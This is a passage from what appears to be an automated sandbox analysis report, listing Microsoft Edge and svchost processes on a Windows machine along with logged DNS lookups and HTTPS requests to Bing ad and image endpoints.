                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,16232176502312801355,6599735231035662222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
                                                                                                                                              8⤵
                                                                                                                                                PID:2992
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,16232176502312801355,6599735231035662222,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
                                                                                                                                                8⤵
                                                                                                                                                  PID:1688
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                    1⤵
                                                                                                                                      PID:3564
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                      1⤵
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      PID:4964
                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                      1⤵
                                                                                                                                        PID:1128
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                        1⤵
                                                                                                                                          PID:1044
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                          1⤵
                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                          PID:4516
                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                          1⤵
                                                                                                                                            PID:3104
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                            1⤵
                                                                                                                                              PID:504
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                              1⤵
                                                                                                                                                PID:4692
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                1⤵
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                PID:4776
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                1⤵
                                                                                                                                                  PID:4804
                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2916

                                                                                                                                                  Network

                                                                                                                                                  • flag-us
                                                                                                                                                    DNS
                                                                                                                                                    8.8.8.8.in-addr.arpa
                                                                                                                                                    Dnscache
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    8.8.8.8.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    Response
                                                                                                                                                    8.8.8.8.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    dnsgoogle
                                                                                                                                                  • flag-us
                                                                                                                                                    DNS
                                                                                                                                                    133.211.185.52.in-addr.arpa
                                                                                                                                                    Dnscache
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    133.211.185.52.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    Response
                                                                                                                                                  • flag-us
                                                                                                                                                    DNS
                                                                                                                                                    172.214.232.199.in-addr.arpa
                                                                                                                                                    Dnscache
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    172.214.232.199.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    Response
                                                                                                                                                  • flag-us
                                                                                                                                                    DNS
                                                                                                                                                    68.159.190.20.in-addr.arpa
                                                                                                                                                    Dnscache
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    68.159.190.20.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    Response
                                                                                                                                                  • flag-us
                                                                                                                                                    DNS
                                                                                                                                                    95.221.229.192.in-addr.arpa
                                                                                                                                                    Dnscache
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    95.221.229.192.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    Response
                                                                                                                                                  • flag-us
                                                                                                                                                    DNS
                                                                                                                                                    g.bing.com
                                                                                                                                                    Dnscache
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    g.bing.com
                                                                                                                                                    IN A
                                                                                                                                                    Response
                                                                                                                                                    g.bing.com
                                                                                                                                                    IN CNAME
                                                                                                                                                    g-bing-com.ax-0001.ax-msedge.net
                                                                                                                                                    g-bing-com.ax-0001.ax-msedge.net
                                                                                                                                                    IN CNAME
                                                                                                                                                    ax-0001.ax-msedge.net
                                                                                                                                                    ax-0001.ax-msedge.net
                                                                                                                                                    IN A
                                                                                                                                                    150.171.28.10
                                                                                                                                                    ax-0001.ax-msedge.net
                                                                                                                                                    IN A
                                                                                                                                                    150.171.27.10
                                                                                                                                                  • flag-us
                                                                                                                                                    GET
                                                                                                                                                    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4be99d259d484e0bbabd7c0ae631006d&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=
                                                                                                                                                    Remote address:
                                                                                                                                                    150.171.28.10:443
                                                                                                                                                    Request
                                                                                                                                                    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4be99d259d484e0bbabd7c0ae631006d&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid= HTTP/2.0
                                                                                                                                                    host: g.bing.com
                                                                                                                                                    accept-encoding: gzip, deflate
                                                                                                                                                    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                    Response
                                                                                                                                                    HTTP/2.0 204
                                                                                                                                                    cache-control: no-cache, must-revalidate
                                                                                                                                                    pragma: no-cache
                                                                                                                                                    expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                    set-cookie: MUID=25C0ACEFC08C6EEA36ACB9F3C18A6F36; domain=.bing.com; expires=Wed, 12-Nov-2025 20:16:40 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                    x-cache: CONFIG_NOCACHE
                                                                                                                                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    x-msedge-ref: Ref A: 459EC2BF3288497E9CE84FCC8477C911 Ref B: LON601060107062 Ref C: 2024-10-18T20:16:40Z
                                                                                                                                                    date: Fri, 18 Oct 2024 20:16:40 GMT
                                                                                                                                                  • flag-us
                                                                                                                                                    GET
                                                                                                                                                    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=4be99d259d484e0bbabd7c0ae631006d&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=
                                                                                                                                                    Remote address:
                                                                                                                                                    150.171.28.10:443
                                                                                                                                                    Request
                                                                                                                                                    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=4be99d259d484e0bbabd7c0ae631006d&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid= HTTP/2.0
                                                                                                                                                    host: g.bing.com
                                                                                                                                                    accept-encoding: gzip, deflate
                                                                                                                                                    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                    cookie: MUID=25C0ACEFC08C6EEA36ACB9F3C18A6F36
                                                                                                                                                    Response
                                                                                                                                                    HTTP/2.0 204
                                                                                                                                                    cache-control: no-cache, must-revalidate
                                                                                                                                                    pragma: no-cache
                                                                                                                                                    expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                    set-cookie: MSPTC=kQ1xUYnaya9OGu-itvY5c1YzTRMe9cAl77hEloLcX9k; domain=.bing.com; expires=Wed, 12-Nov-2025 20:16:40 GMT; path=/; Partitioned; secure; SameSite=None
                                                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                    x-cache: CONFIG_NOCACHE
                                                                                                                                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    x-msedge-ref: Ref A: 889A8908708543498D137996072C5C0D Ref B: LON601060107062 Ref C: 2024-10-18T20:16:40Z
                                                                                                                                                    date: Fri, 18 Oct 2024 20:16:40 GMT
                                                                                                                                                  • flag-us
                                                                                                                                                    GET
                                                                                                                                                    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4be99d259d484e0bbabd7c0ae631006d&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=
                                                                                                                                                    Remote address:
                                                                                                                                                    150.171.28.10:443
                                                                                                                                                    Request
                                                                                                                                                    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4be99d259d484e0bbabd7c0ae631006d&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid= HTTP/2.0
                                                                                                                                                    host: g.bing.com
                                                                                                                                                    accept-encoding: gzip, deflate
                                                                                                                                                    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                    cookie: MUID=25C0ACEFC08C6EEA36ACB9F3C18A6F36; MSPTC=kQ1xUYnaya9OGu-itvY5c1YzTRMe9cAl77hEloLcX9k
                                                                                                                                                    Response
                                                                                                                                                    HTTP/2.0 204
                                                                                                                                                    cache-control: no-cache, must-revalidate
                                                                                                                                                    pragma: no-cache
                                                                                                                                                    expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                    x-cache: CONFIG_NOCACHE
                                                                                                                                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    x-msedge-ref: Ref A: 4272743A7AF9414AAF32DEA2E7BBADFD Ref B: LON601060107062 Ref C: 2024-10-18T20:16:40Z
                                                                                                                                                    date: Fri, 18 Oct 2024 20:16:40 GMT
                                                                                                                                                  • flag-us
                                                                                                                                                    DNS
                                                                                                                                                    154.239.44.20.in-addr.arpa
                                                                                                                                                    Dnscache
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    154.239.44.20.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    Response
                                                                                                                                                  • flag-us
                                                                                                                                                    DNS
                                                                                                                                                    99.193.161.193.in-addr.arpa
                                                                                                                                                    Dnscache
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    99.193.161.193.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    Response
                                                                                                                                                  • flag-us
                                                                                                                                                    DNS
                                                                                                                                                    53.210.109.20.in-addr.arpa
                                                                                                                                                    Dnscache
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    53.210.109.20.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    Response
                                                                                                                                                  • flag-us
                                                                                                                                                    DNS
                                                                                                                                                    206.23.85.13.in-addr.arpa
                                                                                                                                                    Dnscache
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    206.23.85.13.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    Response
                                                                                                                                                  • flag-us
                                                                                                                                                    DNS
                                                                                                                                                    240.221.184.93.in-addr.arpa
                                                                                                                                                    Dnscache
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    240.221.184.93.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    Response
                                                                                                                                                  • flag-us
                                                                                                                                                    DNS
                                                                                                                                                    69.190.18.2.in-addr.arpa
                                                                                                                                                    Dnscache
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    69.190.18.2.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    Response
                                                                                                                                                    69.190.18.2.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    a2-18-190-69deploystaticakamaitechnologiescom
                                                                                                                                                  • flag-us
                                                                                                                                                    DNS
                                                                                                                                                    0.205.248.87.in-addr.arpa
                                                                                                                                                    Dnscache
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    0.205.248.87.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    Response
                                                                                                                                                    0.205.248.87.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    https-87-248-205-0lgwllnwnet
                                                                                                                                                  • flag-us
                                                                                                                                                    DNS
                                                                                                                                                    31.243.111.52.in-addr.arpa
                                                                                                                                                    Dnscache
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    31.243.111.52.in-addr.arpa
                                                                                                                                                    IN PTR
                                                                                                                                                    Response
                                                                                                                                                  • flag-us
                                                                                                                                                    DNS
                                                                                                                                                    tse1.mm.bing.net
                                                                                                                                                    Dnscache
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    tse1.mm.bing.net
                                                                                                                                                    IN A
                                                                                                                                                    Response
                                                                                                                                                    tse1.mm.bing.net
                                                                                                                                                    IN CNAME
                                                                                                                                                    mm-mm.bing.net.trafficmanager.net
                                                                                                                                                    mm-mm.bing.net.trafficmanager.net
                                                                                                                                                    IN CNAME
                                                                                                                                                    ax-0001.ax-msedge.net
                                                                                                                                                    ax-0001.ax-msedge.net
                                                                                                                                                    IN A
                                                                                                                                                    150.171.28.10
                                                                                                                                                    ax-0001.ax-msedge.net
                                                                                                                                                    IN A
                                                                                                                                                    150.171.27.10
                                                                                                                                                  • flag-us
                                                                                                                                                    GET
                                                                                                                                                    https://tse1.mm.bing.net/th?id=OADD2.10239398629741_1IOH1H6D1NJ8OMST7&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                                                                                                                                                    BackgroundTransferHost.exe
                                                                                                                                                    Remote address:
                                                                                                                                                    150.171.28.10:443
                                                                                                                                                    Request
                                                                                                                                                    GET /th?id=OADD2.10239398629741_1IOH1H6D1NJ8OMST7&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                                                                                                                                                    host: tse1.mm.bing.net
                                                                                                                                                    accept: */*
                                                                                                                                                    accept-encoding: gzip, deflate, br
                                                                                                                                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                                                                    Response
                                                                                                                                                    HTTP/2.0 200
                                                                                                                                                    cache-control: public, max-age=2592000
                                                                                                                                                    content-length: 500116
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    x-cache: TCP_HIT
                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                    access-control-allow-headers: *
                                                                                                                                                    access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                                                    timing-allow-origin: *
                                                                                                                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    x-msedge-ref: Ref A: CD569C9C753A4E7C84653403700B347F Ref B: LON601060103060 Ref C: 2024-10-18T20:18:23Z
                                                                                                                                                    date: Fri, 18 Oct 2024 20:18:23 GMT
                                                                                                                                                  • flag-us
                                                                                                                                                    GET
                                                                                                                                                    https://tse1.mm.bing.net/th?id=OADD2.10239340418580_1XZDKNXCHEXKE96NH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                                                                                                                                                    BackgroundTransferHost.exe
                                                                                                                                                    Remote address:
                                                                                                                                                    150.171.28.10:443
                                                                                                                                                    Request
                                                                                                                                                    GET /th?id=OADD2.10239340418580_1XZDKNXCHEXKE96NH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                                                                                                                                                    host: tse1.mm.bing.net
                                                                                                                                                    accept: */*
                                                                                                                                                    accept-encoding: gzip, deflate, br
                                                                                                                                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                                                                    Response
                                                                                                                                                    HTTP/2.0 200
                                                                                                                                                    cache-control: public, max-age=2592000
                                                                                                                                                    content-length: 666447
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    x-cache: TCP_HIT
                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                    access-control-allow-headers: *
                                                                                                                                                    access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                                                    timing-allow-origin: *
                                                                                                                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    x-msedge-ref: Ref A: ADAE4DEAF559498FB707AB6989AAE92F Ref B: LON601060103060 Ref C: 2024-10-18T20:18:23Z
                                                                                                                                                    date: Fri, 18 Oct 2024 20:18:23 GMT
                                                                                                                                                  • flag-us
                                                                                                                                                    GET
                                                                                                                                                    https://tse1.mm.bing.net/th?id=OADD2.10239398629742_1P7YH795LJPRHWP9N&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                                                                                                                                                    BackgroundTransferHost.exe
                                                                                                                                                    Remote address:
                                                                                                                                                    150.171.28.10:443
                                                                                                                                                    Request
                                                                                                                                                    GET /th?id=OADD2.10239398629742_1P7YH795LJPRHWP9N&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                                                                                                                                                    host: tse1.mm.bing.net
                                                                                                                                                    accept: */*
                                                                                                                                                    accept-encoding: gzip, deflate, br
                                                                                                                                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                                                                    Response
                                                                                                                                                    HTTP/2.0 200
                                                                                                                                                    cache-control: public, max-age=2592000
                                                                                                                                                    content-length: 437546
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    x-cache: TCP_HIT
                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                    access-control-allow-headers: *
                                                                                                                                                    access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                                                    timing-allow-origin: *
                                                                                                                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    x-msedge-ref: Ref A: 9F82C168CC074BEAB809BD84D2B4E909 Ref B: LON601060103060 Ref C: 2024-10-18T20:18:23Z
                                                                                                                                                    date: Fri, 18 Oct 2024 20:18:23 GMT
                                                                                                                                                  • flag-us
                                                                                                                                                    GET
                                                                                                                                                    https://tse1.mm.bing.net/th?id=OADD2.10239340418579_1UMXSJ3YHHNUEPPRM&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                                                                                                                                                    BackgroundTransferHost.exe
                                                                                                                                                    Remote address:
                                                                                                                                                    150.171.28.10:443
                                                                                                                                                    Request
                                                                                                                                                    GET /th?id=OADD2.10239340418579_1UMXSJ3YHHNUEPPRM&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                                                                                                                                                    host: tse1.mm.bing.net
                                                                                                                                                    accept: */*
                                                                                                                                                    accept-encoding: gzip, deflate, br
                                                                                                                                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                                                                    Response
                                                                                                                                                    HTTP/2.0 200
                                                                                                                                                    cache-control: public, max-age=2592000
                                                                                                                                                    content-length: 604205
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    x-cache: TCP_HIT
                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                    access-control-allow-headers: *
                                                                                                                                                    access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                                                    timing-allow-origin: *
                                                                                                                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    x-msedge-ref: Ref A: 07735EAA68AB4C2084FFD73F0DC3B7AE Ref B: LON601060103060 Ref C: 2024-10-18T20:18:23Z
                                                                                                                                                    date: Fri, 18 Oct 2024 20:18:23 GMT
                                                                                                                                                  • flag-us
                                                                                                                                                    GET
                                                                                                                                                    https://tse1.mm.bing.net/th?id=OADD2.10239317301291_1H8FN9XYY8JWTIM5Q&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                                                                                                                                                    BackgroundTransferHost.exe
                                                                                                                                                    Remote address:
                                                                                                                                                    150.171.28.10:443
                                                                                                                                                    Request
                                                                                                                                                    GET /th?id=OADD2.10239317301291_1H8FN9XYY8JWTIM5Q&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                                                                                                                                                    host: tse1.mm.bing.net
                                                                                                                                                    accept: */*
                                                                                                                                                    accept-encoding: gzip, deflate, br
                                                                                                                                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                                                                    Response
                                                                                                                                                    HTTP/2.0 200
                                                                                                                                                    cache-control: public, max-age=2592000
                                                                                                                                                    content-length: 768566
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    x-cache: TCP_HIT
                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                    access-control-allow-headers: *
                                                                                                                                                    access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                                                    timing-allow-origin: *
                                                                                                                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    x-msedge-ref: Ref A: 58A5A466602943968BF47D0A7E4E3CA1 Ref B: LON601060103060 Ref C: 2024-10-18T20:18:23Z
                                                                                                                                                    date: Fri, 18 Oct 2024 20:18:23 GMT
                                                                                                                                                  • flag-us
                                                                                                                                                    GET
                                                                                                                                                    https://tse1.mm.bing.net/th?id=OADD2.10239317301700_18ZUY5V0A74HOX1SZ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                                                                                                                                                    BackgroundTransferHost.exe
                                                                                                                                                    Remote address:
                                                                                                                                                    150.171.28.10:443
                                                                                                                                                    Request
                                                                                                                                                    GET /th?id=OADD2.10239317301700_18ZUY5V0A74HOX1SZ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                                                                                                                                                    host: tse1.mm.bing.net
                                                                                                                                                    accept: */*
                                                                                                                                                    accept-encoding: gzip, deflate, br
                                                                                                                                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                                                                    Response
                                                                                                                                                    HTTP/2.0 200
                                                                                                                                                    cache-control: public, max-age=2592000
                                                                                                                                                    content-length: 975817
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    x-cache: TCP_HIT
                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                    access-control-allow-headers: *
                                                                                                                                                    access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                                                    timing-allow-origin: *
                                                                                                                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    x-msedge-ref: Ref A: BA6E9234641046B58011F56E5C6A5A41 Ref B: LON601060103060 Ref C: 2024-10-18T20:18:24Z
                                                                                                                                                    date: Fri, 18 Oct 2024 20:18:24 GMT
                                                                                                                                                  • 150.171.28.10:443
                                                                                                                                                    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4be99d259d484e0bbabd7c0ae631006d&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=
                                                                                                                                                    tls, http2
                                                                                                                                                    2.0kB
                                                                                                                                                    9.4kB
                                                                                                                                                    21
                                                                                                                                                    19

                                                                                                                                                    HTTP Request

                                                                                                                                                    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4be99d259d484e0bbabd7c0ae631006d&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=

                                                                                                                                                    HTTP Response

                                                                                                                                                    204

                                                                                                                                                    HTTP Request

